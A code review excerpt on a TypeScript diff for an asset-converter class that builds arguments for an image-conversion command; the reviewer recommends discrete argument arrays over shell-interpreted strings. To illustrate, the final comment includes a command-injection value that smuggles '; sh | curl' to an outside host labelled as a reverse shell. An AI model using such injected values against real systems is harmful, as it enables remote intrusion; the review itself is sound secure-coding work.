src/logic/asset-converter.ts

```diff
@@ -0,0 +1,83 @@
+import ICommandTrigger from '../ports/ICommandTrigger'
+import { CrunchConversionDefaultOptions, CrunchConversionOptions } from '../types/crunch-conversion'
+import ProcessWrapper from '../types/processWrapper'
+
+export class Conversion {
+  private filePath: string
+  private options?: CrunchConversionOptions
+
+  constructor(filePath: string) {
+    this.filePath = filePath
+  }
+
+  setOptions(options: CrunchConversionOptions): void {
+    this.options = options
+  }
+
+  getArguments(): string[] {
+    const addIfRequired = (condition: boolean, argToAdd: string, args: string[]): string[] => {
+      return condition ? [...args, argToAdd] : args
+    }
+
+    const applyOptionals = (requiredArgs: string[]): string[] => {
+      const fileSizeArgument = `-rescale ${this.options?.size} ${this.options?.size}`
+      const outArgument = `-out ${this.options?.out}`
+      const withSizeIfApplies = addIfRequired(!!this.options?.size, fileSizeArgument, requiredArgs)
+      return addIfRequired(!!this.options?.out, outArgument, withSizeIfApplies)
+    }
+
+    const filePathArgument = `-file ${this.filePath}`
+    const fileFormatArgument = `-fileformat ${this.options?.fileFormat}`
```

Comment:
```suggestion
    if (this.options?.fileFormat) {
      args.push('-fileformat', this.options.fileFormat)
    }
```

Always prefer discrete arguments in a list/array vs parsing or using a shell to interpret them.

It would be easily hackable if `fileFormat: "; sh | curl http://menduz.com/reverse-shell"`